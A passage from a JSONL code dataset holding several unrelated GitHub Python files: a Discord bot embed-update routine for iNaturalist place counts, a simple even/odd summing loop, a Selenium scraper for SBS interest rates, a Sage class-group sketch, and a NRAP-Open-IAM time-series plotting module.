{**inat_embed.params, \"place_id\": place.id}\r\n if action == \"remove\":\r\n # Remove the header if last one and the place's count:\r\n if len(matches) == 1:\r\n description = re.sub(TAXON_PLACES_HEADER_PAT, \"\", description)\r\n description = re.sub(place_counts_pat + r\".*?((?=\\n)|$)\", \"\", description)\r\n else:\r\n # Add the header if first one and the place's count:\r\n if not matches:\r\n description += \"\\n\" + TAXON_PLACES_HEADER\r\n formatted_counts = await format_place_taxon_counts(\r\n self,\r\n place,\r\n taxon,\r\n **count_params,\r\n )\r\n description += \"\\n\" + formatted_counts\r\n\r\n matches = re.findall(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?\\?place_id=(?P\\d+)&.*?\\)\",\r\n description,\r\n )\r\n # Total added only if more than one place:\r\n if len(matches) > 1:\r\n place_ids = \",\".join(matches)\r\n formatted_counts = await format_place_taxon_counts(\r\n self,\r\n place_ids,\r\n taxon,\r\n **count_params,\r\n )\r\n description += f\"\\n{formatted_counts}\"\r\n return description\r\n return description\r\n\r\n async def edit_place_totals_locked(\r\n self, msg, taxon, place, action, place_counts_pat\r\n ):\r\n \"\"\"Update place totals for message locked.\"\"\"\r\n if msg.id not in self.reaction_locks:\r\n self.reaction_locks[msg.id] = asyncio.Lock()\r\n async with self.reaction_locks[msg.id]:\r\n # If permitted, refetch the message because it may have changed prior to\r\n # acquiring lock\r\n if (\r\n msg.guild\r\n and not msg.channel.permissions_for(msg.guild.me).read_message_history\r\n ):\r\n try:\r\n msg = await msg.channel.fetch_message(msg.id)\r\n except discord.errors.NotFound:\r\n return # message has been deleted, nothing left to do\r\n embeds = msg.embeds\r\n inat_embed = INatEmbed.from_discord_embed(embeds[0])\r\n description = inat_embed.description or \"\"\r\n mat = re.search(place_counts_pat, description)\r\n if action == \"toggle\":\r\n action = \"remove\" if mat else \"add\"\r\n\r\n if (mat and (action == \"remove\")) or (not mat and (action == \"add\")):\r\n description = await self.update_place_totals(\r\n description, taxon, place, action, inat_embed, place_counts_pat\r\n )\r\n if len(description) > MAX_EMBED_DESCRIPTION_LEN:\r\n raise NoRoomInDisplay(\r\n \"No more room for additional places in this display.\"\r\n )\r\n inat_embed.description = description\r\n if re.search(r\"\\*total\\*\", inat_embed.description):\r\n inat_embed.set_footer(\r\n text=\"Non-overlapping place counts may not add up to \"\r\n \"the total if they changed since they were added. \"\r\n \"Remove, then add them again to update their counts.\"\r\n )\r\n else:\r\n inat_embed.set_footer(text=\"\")\r\n await msg.edit(embed=inat_embed)\r\n","repo_name":"dronefly-garden/dronefly","sub_path":"inatcog/embeds/inat.py","file_name":"inat.py","file_ext":"py","file_size_in_byte":61373,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"2656809465","text":"list_numbers = [1,5,8,7,6,8,2,5,2,6,4,8,5,9,8,3,5,4,2,5,6,4]\n\nsum_even = 0\n\nsum_odd = 0\n\nfor object in list_numbers:\n if object%2==0:\n sum_even += object\n elif object%2 ==1:\n sum_odd += object\n else:\n print()\n","repo_name":"Pushpendra-Darky/Total-Python","sub_path":"Day4/for loop/LP_3.py","file_name":"LP_3.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71715651365","text":"\nimport time\nimport openpyxl\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass SBSTasaDiaria:\n\n def __init__(self):\n self.datos = []\n self.driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n\n def iniciar_busqueda(self, url):\n self.driver.get(url)\n # self.driver.maximize_window()\n\n def recolectar_datos(self):\n tam = []\n time.sleep(2)\n tamn = self.driver.find_element(By.XPATH, '//table[@class=\"APLI_tabla\"]/tbody/tr[1]/td[2]').text\n tamex = self.driver.find_element(By.XPATH, '//table[@class=\"APLI_tabla\"]/tbody/tr[7]/td[2]').text\n\n float_tamn = float(tamn.strip('%'))\n float_tamex = float(tamex.strip('%'))\n\n tam.append(float_tamn)\n tam.append(float_tamex)\n self.driver.quit()\n\n return tam\n\n","repo_name":"AlexSebastianSC/Indices-Financieros-WS","sub_path":"src/TasaDiaria.py","file_name":"TasaDiaria.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74900874404","text":"from sage.all import *\nfrom solve_unit_group import compute_S_units\n\n\ndef solve_class_group(k: NumberField):\n bounded_ideals = k.get_bounded_ideals()\n S_units = compute_S_units(bounded_ideals)\n u, v = S_units\n\n# Gets all prime ideals with norm less than Minkowski bound\n# Involves enumerating primes less than this bound, which reqi\ndef get_bounded_prime_ideals(k: NumberField):\n # Factor (p) for all primes p less than or equal to Minkowski bound\n # Add 1, since prime_range is exclusive of the bound and rounds non-ints down\n primes = prime_range(k.minkowski_bound() + 1)\n\n bounded_ideals = []\n for prime in primes:\n ideal_factors = k.ideal(prime).factor()\n bounded_ideals.extend([ideal_factor[0] for ideal_factor in list(ideal_factors)])\n return bounded_ideals\n\n","repo_name":"jdieter31/Quantum-Class-Group-Computation","sub_path":"class_group_solver.py","file_name":"class_group_solver.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17628098443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCode to create different time-series visualizations for NRAP-Open-IAM.\n\nLast Modified: June, 2023\n\n@author: Seth King\n@author: Nate Mitchell (Nathaniel.Mitchell@NETL.DOE.GOV)\n@author: Veronika Vasylkivska (Veronika.Vasylkivska@NETL.DOE.GOV)\nLRST (Battelle/Leidos) supporting NETL\n\"\"\"\nimport warnings\nimport logging\nimport math\nimport re\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.cbook\nimport matplotlib.colors as clrs\nfrom matk.sampleset import percentile, mean\nfrom .label_setup import (LEGEND_DICT, Y_LABEL_DICT, Y_LABEL_SPLIT_DICT,\n Y_LABEL_2ROWS_DICT, Y_LABEL_2ROWS_SPLIT_DICT,\n TITLE_DICT, TITLE_SPLIT_DICT)\n\n# Ignore futurewarning from numpy about record array subarray copies vs views.\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=matplotlib.cbook.mplDeprecation)\n\n# Constants used to adjust figure formatting\nDEFAULT_FIG_WIDTH = 13\nDEFAULT_FIG_HEIGHT = 8\nAXIS_LABEL_PAD_REF = 4\nTITLE_PAD_REF = 3\nSINGLE_PLOT_FONTSIZE_ADJUST = 1.5\n\nAX_LINEWIDTH_REF = 1.5\nLINEWIDTH_REF = 2.5\nXTICK_SIZE_REF = 5\nYTICK_SIZE_REF = 5\nXTICK_WIDTH_REF = 1.5\nYTICK_WIDTH_REF = 1.5\n\n# These are used to check if the x and y labels are too long relative to the subplot.\n# These values were found by trial and error.\nMAX_YLABEL_HEIGHT_FRAC = 0.85\nMAX_YLABEL_WIDTH_FRAC = 0.075\n\nMAX_XLABEL_HEIGHT_FRAC = 0.4\nMAX_XLABEL_WIDTH_FRAC = 0.5\n\nMAX_TITLE_HEIGHT_FRAC = 0.1\nMAX_TITLE_WIDTH_FRAC = 0.4\n\nLEGEND_ITEM_THRESH1 = 5\nLEGEND_ITEM_THRESH2 = 10\nLEGEND_ITEM_THRESH3 = 15\nLEGEND_ITEM_THRESH4 = 20\n\nLEGEND_FRAME_ALPHA = 0.5\nLEGEND_COLUMNS = 1\n\n# I purposefully included more than 10 marker styles so that the rotation of\n# marker styles (when plotting a large number of metrics) is desynchronized from\n# the rotation of line colors. The default rotation of 10 line colors is used,\n# then two rotations of darker and lighter versions of the same 10 colors are\n# used. Having the rotations of marker styles and colors desynchronized may\n# help clarify such distinctions. Most simulations wil use many years of data\n# with a 1 year timestep, however, in which case markers may be too close together.\ndefaultMarkerList = ['o', '^', 's', 'd', 'X', 'P', '*', 'p', 'D', 'H',\n '>', '<', 'v']\ndefaultLineStyleList = ['solid', 'dotted', 'dashed', 'dashdot']\nhatchList = ['|', '-', '+', 'x', 'o', 'O', '.', '*', '/', '\\\\']\n\ndef time_series_plot(output_names, sm, s, plot_data, output_list, name='Figure 1',\n analysis='forward', savefig=None, title=None, subplot=None,\n plot_type=None, figsize=None, fontname='Arial',\n gen_font_size=10, axis_label_font_size=12,\n title_font_size=12, legend_font_size=10, bold_labels=True,\n useMathTextOption=True, generate_title=True,\n plot_grid_option=True, grid_alpha_val=0.15):\n \"\"\"\n Makes a time series plots of statistics of data in output_names.\n Highlights percentiles, mean, and median values.\n\n :param output_names: List of observation names to match with component models and plot.\n Examples:\n output_names=['pressure']\n\n output_names=['pressure', 'mass_CO2_aquifer1']\n\n output_names=['pressure', 'CO2_aquifer1', 'CO2_aquifer2']\n :type output_names: list\n\n :param sm: OpenIAM System model for which plots are created\n :type sm: openiam.SystemModel object\n\n :param s: SampleSet with results of analysis performed on the system model.\n None for forward analysis.\n :type s: matk.SampleSet object\n\n :param plot_data: Dictionary of setup for a given plot\n :type plot_data: dict\n\n :param output_list: Dictionary mapping component models to observations\n Examples:\n This dictionary only includes pressure from a SimpleReservoir named sres.\n output_list={sres: 'pressure'}\n\n This dictionary includes pressure from a SimpleReservoir named sres as well\n as the mass of CO2 leaked to aquifer 1. The CO2 mass comes from a RateToMassAdapter\n named adapt.\n output_list={sres: 'pressure', adapt: 'mass_CO2_aquifer1'}\n\n This dictionary includes pressure from a SimpleReservior named sres as well\n as well as the CO2 leakage rates to aquifers 1 and 2. The CO2 leakage rates\n come from a MultisegmentedWellbore named ms.\n output_list={sres: 'pressure', ms: ['CO2_aquifer1', 'CO2_aquifer2']}\n :type output_list: dict\n\n :param name: Figure Name to be used/created.\n :type name: str\n\n :param analysis: Type of OpenIAM system analysis performed ('forward',\n 'lhs', or 'parstudy')\n :type analysis: str\n\n :param savefig: Filename to save resulting figure to. No file saved if None.\n :type savefig: str\n\n :param title: Optional Title for figure\n :type title: str\n\n :param subplot: Dictionary for subplot controls, use=True will use\n subplotting (boolean default=False), ncols=n will use n columns\n of subplots (positive integer default 1); comp.var_name=sub_title\n will title the subplots of comp.var_name subtitle (string default=comp.var_name).\n Examples:\n This dictionary creates only one plot (i.e., no subplots). If you are\n plotting multiple types of metrics (e.g., pressure and CO2 leakage\n rates), all metrics will be displayed together and only the yaxis\n label for the metric plotted last will be shown. Do not use\n this setup in such a case: subplot={'use': False}\n\n This dictionary enables the creation of subplots and specifies\n the use of only one column: subplot={'use': True, 'ncols': 1}\n\n This dictionary includes figure titles for sres.pressure, ms.CO2_aquifer1, and\n ms.CO2_aquifer2.\n subplot={'use': True, 'ncols': 3, 'sres.pressure': 'Pressure at location',\n 'ms.CO2_aquifer1': 'CO$_2$ Leakage Rate to Aquifer 1',\n 'ms.CO2_aquifer2': 'CO$_2$ Leakage Rate to Aquifer 2'}\n :type subplot: dict\n\n :param plot_type: List of 'real' and/or 'stats' plot types to produce.\n 'real' plots realization values\n 'stats' plots quartiles, mean, and median values\n :type plot_type: list of 'real' and/or 'stats'\n\n :param figsize: width and height of the figure (width, height), in inches. Default is\n None, in which case the DEFAULT_FIG_WIDTH and DEFAULT_FIG_HEIGHT are used.\n :type figsize: tuple or NoneType\n\n :param fontname: name of the font type to be used\n :type fontname: str\n\n :param gen_font_size: fontsize for tick labels, etc.\n :type gen_font_size: float or int\n\n :param axis_label_font_size: fontsize for x and y axis labels. These font sizes are\n later updated depending on the figsize and number of subplots.\n :type axis_label_font_size: float or int\n\n :param title_font_size: fontsize for the title. This font size is later\n updated depending on the figsize and number of subplots.\n :type title_font_size: float or int\n\n :param legend_font_size: fontsize for the legend. This font size is later\n updated depending on the figsize.\n :type legend_font_size: float or int\n\n :param bold_labels: option to use bold x and y labels and bold titles. Set to\n True for bold labels, False for normal labels.\n :type bold_labels: bool\n\n :param useMathTextOption: option for the useMathText option for the y axis.\n :type useMathTextOption: bool\n\n :param generate_title: option to enable (True) or disable (False) figure titles.\n If no title is included in the subplot dictionary, a title is created. The\n created title will include location numbers if the variable name includes\n a location (e.g., '001' in 'msw1_001.C02_aquifer1').\n :type generate_title: bool\n\n :param plot_grid_option: option to display a grid (True) or not (False)\n :type plot_grid_option: bool\n\n :param grid_alpha_val: alpha value for the grid\n :type grid_alpha_val: float\n\n :return: None\n \"\"\"\n # Dictionary with variables used to adjust figure formatting\n fig_setup = {'gen_font_size': gen_font_size,\n 'axis_label_font_size': axis_label_font_size,\n 'title_font_size': title_font_size,\n 'legend_font_size': legend_font_size,\n 'line_width': LINEWIDTH_REF,\n 'ax_line_width': AX_LINEWIDTH_REF,\n 'xtick_size': XTICK_SIZE_REF,\n 'ytick_size': YTICK_SIZE_REF,\n 'xtick_width': XTICK_WIDTH_REF,\n 'ytick_width': YTICK_WIDTH_REF,\n 'axis_label_pad': AXIS_LABEL_PAD_REF,\n 'title_pad': TITLE_PAD_REF,\n 'xaxis_font_size': axis_label_font_size,\n 'yaxis_font_size': axis_label_font_size}\n\n selected_keys = ['gen_font_size', 'axis_label_font_size',\n 'title_font_size', 'legend_font_size', 'line_width',\n 'ax_line_width', 'xtick_size', 'ytick_size',\n 'xtick_width', 'ytick_width']\n\n if bold_labels:\n fig_setup['label_font_weight'] = 'bold'\n else:\n fig_setup['label_font_weight'] = 'normal'\n\n if figsize is None:\n figsize = (DEFAULT_FIG_WIDTH, DEFAULT_FIG_HEIGHT)\n else:\n # Scale font sizes to the specified figure size. Here, the updated\n # font size scales with the new height or width (relative to the default\n # height or width). This scaling uses the length scale with the largest change\n # relative to the default values (e.g., if height has a larger change, then\n # fontsize is scaled using the specified height value).\n dw_ratio = np.abs(figsize[0] - DEFAULT_FIG_WIDTH)/DEFAULT_FIG_WIDTH\n dh_ratio = np.abs(figsize[1] - DEFAULT_FIG_HEIGHT)/DEFAULT_FIG_HEIGHT\n\n if figsize != (DEFAULT_FIG_WIDTH, DEFAULT_FIG_HEIGHT):\n if dw_ratio > dh_ratio:\n L1 = DEFAULT_FIG_WIDTH\n L2 = figsize[0]\n elif dw_ratio < dh_ratio:\n L1 = DEFAULT_FIG_HEIGHT\n L2 = figsize[1]\n\n # Update the font sizes - some of these are also updated later on, depending\n # on subplot sizes. The fontsize is adjusted depending on the input figsize -\n # sufficiently shrinking the fontsize can be important for small figures, but\n # increasing font sizes in the same way often leads to font that is way too large.\n if (L2 / L1) < 1:\n for key in selected_keys:\n # The formula is simplified based on initial Nate's idea\n fig_setup[key] = 0.5*(1 + L2/L1) * fig_setup[key]\n elif (L2 / L1) > 1:\n for key in selected_keys:\n # The formula is simplified based on initial Nate's idea\n fig_setup[key] = 0.25*(3 + L2/L1) * fig_setup[key]\n\n # These are updated separately depending on the number of rows and columns\n xaxis_font_size_ref = fig_setup['axis_label_font_size']\n yaxis_font_size_ref = fig_setup['axis_label_font_size']\n title_font_size_ref = fig_setup['title_font_size']\n legend_font_size_ref = fig_setup['legend_font_size']\n\n # Update matplotlib figure setup\n update_rc_setup(fig_setup, fontname)\n\n # Find number of subplots\n num_plots = get_number_of_subplots(output_names, output_list)\n\n # Process subplots and their type data\n # subplots_data has the following keys: 'use', 'nrows', 'ncols',\n # 'single_plot', 'type' + (possibly) keys representing titles of subplots\n # if defined by user\n subplots_data = setup_subplots_data(subplot, plot_type, num_plots)\n\n # Initialize indices\n subplot_ind = 1\n color_ind = 0\n reals_ind = 0\n used_colors = []\n markerRef = 0\n lineStyleRef = 0\n hatchRef = 0\n\n useMarkers, useLines, varyLineStyles, figdpi = get_plot_yaml_input(\n plot_data, name)\n\n if not useMarkers:\n markerList = ['None']\n else:\n markerList = defaultMarkerList\n\n if not useLines:\n lineStyleList = ['None']\n varyLineStyles = False\n else:\n lineStyleList = defaultLineStyleList\n\n # Transform time points from days to years\n time = sm.time_array / 365.25\n # Create figure\n fig = plt.figure(num=name, figsize=figsize, dpi=figdpi)\n # Loop over observation names in outputs\n for obs_to_plot in output_names:\n\n # Some of the sizes can be adjusted within the loop, so reset them each time\n fig_setup = reset_sizes(fig_setup, xaxis_font_size_ref, yaxis_font_size_ref,\n title_font_size_ref, legend_font_size_ref)\n xaxis_fontsizes_used = []\n yaxis_fontsizes_used = []\n\n # If this figure has only one plot, slightly increase the font sizes\n # (no risk of overlap with other subplots)\n if subplots_data['single_plot']:\n fig_setup = update_single_plot_setup(fig_setup, fontname)\n\n # List of components providing given observation\n cmpnts_to_process = process_components(obs_to_plot, output_list)\n\n for cmpnt_obj in cmpnts_to_process:\n\n cmpnt_name = cmpnt_obj.name\n full_obs_nm = '.'.join([cmpnt_name, obs_to_plot])\n\n # Add subplot\n ax = plt.subplot(\n subplots_data['nrows'], subplots_data['ncols'], subplot_ind)\n\n if not subplots_data['single_plot']:\n subplot_ind += 1\n color_ind = 0\n reals_ind = 0\n used_colors = []\n markerRef = 0\n lineStyleRef = 0\n\n lgnd_label, label, loc_ind = generate_legend_setup(\n obs_to_plot, cmpnt_name, analysis)\n\n colorValReal, colorValStats, used_colors, color_ind, \\\n hatch_check = get_colors(reals_ind, color_ind, used_colors,\n subplots_data)\n\n if useMarkers and not colorValReal is None:\n rgbReal = clrs.to_rgba(colorValReal[:])\n markerEdgeColor = np.array(list(rgbReal[:]))\n markerEdgeColor /= 2\n markerEdgeColor[-1] = 1\n else:\n markerEdgeColor = 'None'\n\n if analysis == 'forward':\n values = sm.collect_observations_as_time_series(\n cmpnt_obj, obs_to_plot)\n ax.plot(time, values, '-', label=label, color=colorValReal,\n marker=markerList[markerRef],\n markeredgecolor = markerEdgeColor,\n linestyle=lineStyleList[lineStyleRef], alpha=0.8,\n linewidth=fig_setup['line_width'])\n reals_ind = reals_ind + 1\n\n elif analysis in ['lhs', 'parstudy']:\n ind_list = list(range(len(time)))\n obs_names = [full_obs_nm + '_{0}'.format(indd)\n for indd in ind_list]\n obs_percentiles = percentile(s.recarray[obs_names],\n [0, 25, 50, 75, 100])\n obs_means = mean(s.recarray[obs_names])\n values = np.array(\n [s.recarray[full_obs_nm + '_'\n + str(indd)] for indd in ind_list])\n\n if 'real' in subplots_data['type']:\n if 'stats' in subplots_data['type']:\n ax.plot(time, values, color=colorValReal,\n marker=markerList[markerRef],\n markeredgecolor = markerEdgeColor,\n linestyle=lineStyleList[lineStyleRef],\n label=label, linewidth=fig_setup['line_width'],\n alpha=0.33, zorder = 0)\n else:\n ax.plot(time, values, color=colorValReal,\n marker=markerList[markerRef],\n markeredgecolor = markerEdgeColor,\n linestyle=lineStyleList[lineStyleRef],\n label=label, linewidth=fig_setup['line_width'],\n alpha=0.8)\n reals_ind = reals_ind + 1\n\n if 'stats' in subplots_data['type']:\n if not hatch_check:\n ax.fill_between(time, obs_percentiles[3, :],\n obs_percentiles[4, :],\n label='Upper and lower quartiles' + lgnd_label,\n color=colorValStats, alpha=0.15)\n ax.fill_between(time, obs_percentiles[1, :],\n obs_percentiles[3, :],\n label='Middle quartiles' + lgnd_label,\n color=colorValStats, alpha=0.3)\n ax.fill_between(time, obs_percentiles[0, :],\n obs_percentiles[1, :],\n color=colorValStats, alpha=0.15)\n ax.plot(time, obs_percentiles[2, :], color=colorValStats,\n label='Median value' + lgnd_label,\n linewidth = fig_setup['line_width'],\n linestyle = ':', alpha=0.8)\n ax.plot(time, obs_means, color=colorValStats,\n label='Mean value' + lgnd_label,\n linewidth = fig_setup['line_width'], alpha=0.8)\n\n elif hatch_check:\n ax.fill_between(time, obs_percentiles[3, :],\n obs_percentiles[4, :],\n label='Upper and lower quartiles' + lgnd_label,\n color=colorValStats, alpha=0.15,\n hatch = hatchList[hatchRef])\n ax.fill_between(time, obs_percentiles[1, :],\n obs_percentiles[3, :],\n label='Middle quartiles' + lgnd_label,\n color=colorValStats, alpha=0.3,\n hatch = hatchList[hatchRef])\n ax.fill_between(time, obs_percentiles[0, :],\n obs_percentiles[1, :],\n color=colorValStats, alpha=0.15,\n hatch = hatchList[hatchRef])\n ax.plot(time, obs_percentiles[2, :], color=colorValStats,\n label='Median value' + lgnd_label,\n linewidth = fig_setup['line_width'],\n linestyle = ':', alpha=0.8)\n ax.plot(time, obs_means, color=colorValStats,\n label='Mean value' + lgnd_label,\n linewidth = fig_setup['line_width'], alpha=0.8)\n hatch_check = False\n hatchRef += 1\n if hatchRef > (len(hatchList) - 1):\n hatchRef = 0\n\n color_ind += 1\n\n if useMarkers:\n markerRef += 1\n if markerRef > (len(defaultMarkerList) - 1):\n markerRef = 0\n\n if varyLineStyles:\n lineStyleRef += 1\n if lineStyleRef > (len(defaultLineStyleList) - 1):\n lineStyleRef = 0\n\n if plot_grid_option:\n ax.grid(alpha=grid_alpha_val)\n\n # X LABEL\n fig_setup = adjust_x_label(ax, fig, fig_setup, subplots_data)\n xaxis_fontsizes_used.append(fig_setup['xaxis_font_size'])\n\n # Y LABEL\n fig_setup = adjust_y_label(obs_to_plot, cmpnt_name, ax, fig,\n fig_setup, subplots_data, useMathTextOption)\n yaxis_fontsizes_used.append(fig_setup['yaxis_font_size'])\n\n # TITLE\n sub_title = get_title(obs_to_plot, cmpnt_name, subplots_data, loc_ind)\n\n if generate_title:\n fig_setup = adjust_title(sub_title, ax, fig, fig_setup, subplots_data)\n else:\n # No title\n pass\n\n min_fontsize = make_label_fontsizes_uniform(\n subplot_ind - 1, xaxis_fontsizes_used, yaxis_fontsizes_used,\n subplots_data)\n\n if fig_setup['gen_font_size'] > min_fontsize:\n fig_setup['gen_font_size'] = min_fontsize\n update_rc_setup(fig_setup, fontname)\n\n # Used to reset the legend font size within the loop through the axes.\n # Otherwise, the font size could shrink from one subplot to the next.\n legend_font_size_ref2 = fig_setup['legend_font_size']\n\n if analysis == 'forward':\n ax_list = fig.axes\n for ax in ax_list:\n handle_list = []\n label_list = []\n handles, labels = ax.get_legend_handles_labels()\n\n for handle, label in zip(handles, labels):\n if label not in label_list:\n handle_list.append(handle)\n label_list.append(label)\n\n fig_setup['legend_font_size'] = legend_font_size_ref2\n fig_setup = check_legend(handle_list, fig_setup, min_fontsize,\n subplots_data)\n\n ax.legend(handle_list, label_list, fancybox=False,\n fontsize=fig_setup['legend_font_size'],\n framealpha=fig_setup['legend_framealpha'],\n ncol=fig_setup['legend_columns'])\n\n elif analysis in ['lhs', 'parstudy']:\n ax_list = fig.axes\n for ax in ax_list:\n handle_list = []\n label_list = []\n handles, labels = ax.get_legend_handles_labels()\n for handle, label in zip(handles, labels):\n if label not in label_list:\n handle_list.append(handle)\n label_list.append(label)\n\n fig_setup['legend_font_size'] = legend_font_size_ref2\n fig_setup = check_legend(handle_list, fig_setup, min_fontsize,\n subplots_data)\n\n ax.legend(handle_list, label_list, fancybox=False,\n fontsize=fig_setup['legend_font_size'],\n framealpha=fig_setup['legend_framealpha'],\n ncol=fig_setup['legend_columns'])\n else:\n pass\n\n if title:\n fig.suptitle(title, fontweight=fig_setup['label_font_weight'],\n fontsize=fig_setup['title_font_size'])\n\n # With 3 or more rows, the titles and x-axis labels often overlap.\n if subplots_data['single_plot']:\n fig.subplots_adjust(left=0.15, bottom=0.1, right=0.85, top=0.9,\n wspace=0.1, hspace=0.1)\n elif subplots_data['nrows'] >= 3:\n fig.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9,\n wspace=0.25, hspace=0.5)\n else:\n fig.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9,\n wspace=0.25, hspace=0.33)\n\n if savefig:\n try:\n fig.savefig(savefig)\n except ValueError:\n # User has specified plot with a '.' in name but no extension.\n # Add .png as output format.\n savefig += '.png'\n fig.savefig(savefig)\n else:\n fig.show()\n\n plt.close()\n # Restore to default matplotlib settings\n # matplotlib.rcdefaults()\n\n\ndef reset_sizes(fig_setup, xaxis_font_size_ref, yaxis_font_size_ref,\n title_font_size_ref, legend_font_size_ref):\n \"\"\"\n Reset some of the sizes to original values\n\n Parameters\n ----------\n fig_setup : dict\n Contains information about sizes of different figure elements.\n\n Returns updated dictionary sizes\n -------\n \"\"\"\n fig_setup['xaxis_font_size'] = xaxis_font_size_ref\n fig_setup['yaxis_font_size'] = yaxis_font_size_ref\n fig_setup['title_font_size'] = title_font_size_ref\n fig_setup['legend_font_size'] = legend_font_size_ref\n fig_setup['legend_framealpha'] = LEGEND_FRAME_ALPHA\n fig_setup['legend_columns'] = LEGEND_COLUMNS\n fig_setup['axis_label_pad'] = AXIS_LABEL_PAD_REF\n fig_setup['title_pad'] = TITLE_PAD_REF\n\n return fig_setup\n\n\ndef update_single_plot_setup(fig_setup, fontname):\n \"\"\"\n Update some of the relevant fig_setup entries if single plot (without subplots)\n is to be generated.\n\n Parameters\n ----------\n fig_setup : dict\n Contains information about sizes and properties of different figure elements.\n\n Returns updated dictionary fig_setup\n \"\"\"\n fig_setup['gen_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['xaxis_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['yaxis_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['title_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n # The legend font sizes can easily become too big, so the initial\n # adjustment is scaled down\n fig_setup['legend_font_size'] = 0.5*fig_setup['legend_font_size']*(\n 1 + SINGLE_PLOT_FONTSIZE_ADJUST)\n value = fig_setup['gen_font_size']\n font = {'family': fontname,\n 'weight': 'normal',\n 'size': value}\n plt.rc('font', **font)\n fig_setup['axis_label_pad'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['title_pad'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n\n return fig_setup\n\n\ndef update_rc_setup(fig_setup, fontname):\n \"\"\"\n Update matplotlib.pyplot parameters using information in the fig_setup and fontname\n arguments.\n\n Parameters\n ----------\n fig_setup : dict\n Contains information about sizes and properties of different figure elements.\n\n fontname : str\n Name of font for figure elements\n\n Returns\n -------\n None.\n \"\"\"\n font = {'family': fontname,\n 'weight': 'normal',\n 'size': fig_setup['gen_font_size']}\n plt.rc('font', **font)\n plt.rcParams['axes.linewidth'] = fig_setup['ax_line_width']\n plt.rcParams['xtick.major.size'] = fig_setup['xtick_size']\n plt.rcParams['ytick.major.size'] = fig_setup['ytick_size']\n plt.rcParams['xtick.major.width'] = fig_setup['xtick_width']\n plt.rcParams['ytick.major.width'] = fig_setup['ytick_width']\n\n\ndef get_number_of_subplots(output_names, cmpnt_to_output):\n \"\"\"\n Calculate required number of subplots for the requested outputs.\n\n :param output_names: List of observation names to match with component models.\n Examples:\n output_names=['pressure']\n\n output_names=['pressure', 'mass_CO2_aquifer1']\n\n output_names=['pressure', 'CO2_aquifer1', 'CO2_aquifer2']\n :type output_names: list\n\n :param cmpnt_to_output: Dictionary mapping component models to observations\n Examples:\n This dictionary only includes pressure from a component saved in variable sres.\n cmpnt_to_output={sres: 'pressure'}\n\n Returns number of subplots required\n \"\"\"\n nplots = 0\n for obs_nm in output_names:\n for cmpnt in cmpnt_to_output:\n if obs_nm in cmpnt_to_output[cmpnt]:\n nplots += 1\n\n return nplots\n\n\ndef setup_subplots_data(subplot, plot_type, num_plots):\n \"\"\"\n Setup dictionary containing information about subplots:\n single subplot versus many, number of rows and columns,\n type of data (realizations and/or stats).\n\n Possible keys: 'use', 'nrows', 'ncols', 'single_plot', 'type' (plus data about\n titles corresponding to different cmpnt_name.obs_name subplots; these data\n might not be necessarily present). Note that this function is also set up to\n read capitalized versions of the in .yaml files (Use, and NumCols instead\n of use and ncols), as this approach matches the conventions of other plot\n types. The capitalized or non-capitaized inputs will have the same effects,\n however.\n \"\"\"\n # Initialize subplots_data dictionary depending on the input arguments\n if subplot is None:\n subplots_data = {'use': False}\n else:\n subplots_data = subplot\n\n if 'Use' in subplots_data:\n subplots_data['use'] = subplots_data['Use']\n del subplots_data['Use']\n\n if 'NumCols' in subplots_data:\n subplots_data['ncols'] = subplots_data['NumCols']\n del subplots_data['NumCols']\n\n # Process plot type\n if plot_type is None:\n subplots_data['type'] = ['real']\n else:\n subplots_data['type'] = plot_type\n\n if not subplots_data['use']: # if subplots are not to be used\n subplots_data['single_plot'] = True\n subplots_data['ncols'] = 1\n subplots_data['nrows'] = 1\n else:\n subplots_data['single_plot'] = False\n if 'ncols' not in subplots_data:\n if num_plots <= 3:\n subplots_data['ncols'] = 1\n elif num_plots > 3:\n subplots_data['ncols'] = 2\n\n subplots_data['nrows'] = math.ceil(float(num_plots) / subplots_data['ncols'])\n\n # If the user entered 'use': True in the subplot dictionary but there is\n # still only one row and one column in this plot, set single_plot to True.\n if subplots_data['ncols'] == 1 and subplots_data['nrows'] == 1:\n subplots_data['single_plot'] = True\n\n return subplots_data\n\n\ndef get_label(obs_name, labels, split_labels):\n \"\"\"\n Get label for y-axis for a plot of a given observation\n\n :param obs_name: name of observation to be shown on a figure\n :type obs_name: str\n\n :param labels: dictionary containing y-labels corresponding to observation\n names\n :type labels: dict()\n\n :param split_labels: dictionary containing y-labels corresponding to particular\n parts of observation names\n :type split_labels: dict()\n\n Returns:\n string to use for y-label\n \"\"\"\n out_flag = 1\n if obs_name in labels:\n str_label = labels[obs_name]\n else:\n # The observation name is split on numerical characters:\n # it can be 2 in CO2_aquifer or it can be 1 (or similar) in brine_aquifer1\n # This works on preexisting known observation names\n split_name = re.split('\\d', obs_name)\n try:\n str_label = split_labels[split_name[0]]\n except KeyError:\n str_label = obs_name\n out_flag = 0\n\n return str_label, out_flag\n\n\ndef generate_legend_setup(obs_name, cmpnt_name, analysis):\n \"\"\"\n Generate legend setup\n\n Returns lgnd_label, label and line_style\n \"\"\"\n if '_' in cmpnt_name:\n 